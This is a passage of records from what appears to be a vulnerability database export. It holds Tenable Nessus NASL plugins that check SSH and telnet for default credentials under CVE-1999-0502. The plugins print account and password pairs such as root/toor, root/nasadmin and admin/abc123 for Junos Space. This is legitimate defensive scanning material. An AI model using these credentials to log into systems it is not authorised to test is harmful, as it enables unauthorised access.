script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (abc123) for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'abc123'. An attacker can leverage this issue to gain full access to\nthe affected system.\n\nNote that Junos Space is known to use these credentials by default.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=KB26220\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_space\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:27", "description": "The account 'administrator' on the remote host has the default password '1234'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '1234' for 'administrator' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMINISTRATOR_1234.NASL", "href": "https://www.tenable.com/plugins/nessus/94372", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"administrator\";\npassword = \"1234\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94372);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '1234' for 'administrator' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'administrator' on the remote host has the default\npassword '1234'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:06", "description": "The account 'admin1' on the remote host has the default password 'password'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'password' for 'admin1' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN1_PASSWORD.NASL", "href": "https://www.tenable.com/plugins/nessus/94359", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin1\";\npassword = \"password\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94359);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'password' for 'admin1' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin1' on the remote host has the default password\n'password'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:04:54", "description": "The account 'root' on the remote host has the password 'toor'. An attacker may leverage this issue to gain total control of the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2009-03-05T00:00:00", "type": "nessus", "title": "Default Password (toor) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_TOOR.NASL", "href": "https://www.tenable.com/plugins/nessus/35777", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"toor\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35777);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (toor) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known defautl password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'toor'. An\nattacker may leverage this issue to gain total control of the affected\nsystem.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T14:57:59", "description": "The account 'root' on the remote host has the password 'nasadmin'. An attacker may leverage this issue to gain total control of the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2012-02-13T00:00:00", "type": "nessus", "title": "Default Password (nasadmin) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_NASADMIN.NASL", "href": "https://www.tenable.com/plugins/nessus/57916", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"nasadmin\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57916);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (nasadmin) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'nasadmin'. \nAn attacker may leverage this issue to gain total control of the\naffected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"os_fingerprint.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (report_paranoia < 2)\n{\n os = get_kb_item(\"Host/OS\");\n if (!os || \"Celerra\" >!< os) audit(AUDIT_OS_NOT, \"EMC Celerra\");\n}\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:08:01", "description": "The account 'Administrator' on the remote host has the default password 'meinsm'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'meinsm' for 'Administrator' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMINISTRATOR_MEINSM.NASL", "href": "https://www.tenable.com/plugins/nessus/94373", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"Administrator\";\npassword = \"meinsm\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94373);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'meinsm' for 'Administrator' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'Administrator' on the remote host has the default\npassword 'meinsm'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:07:33", "description": "The account 'root' on the remote host has the default password '7ujMko0vizxv'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '7ujMko0vizxv' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_7UJMKO0VIZXV.NASL", "href": "https://www.tenable.com/plugins/nessus/94384", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"7ujMko0vizxv\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94384);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '7ujMko0vizxv' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'7ujMko0vizxv'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:51", "description": "The account 'glftpd' has the password 'glftpd'. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Default Password (glftpd) for 'glftpd' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_GLFTPD.NASL", "href": "https://www.tenable.com/plugins/nessus/11258", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"glftpd\";\npassword = \"glftpd\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11258);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (glftpd) for 'glftpd' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'glftpd' has the password 'glftpd'. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it if possible.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Tenable Network Security, 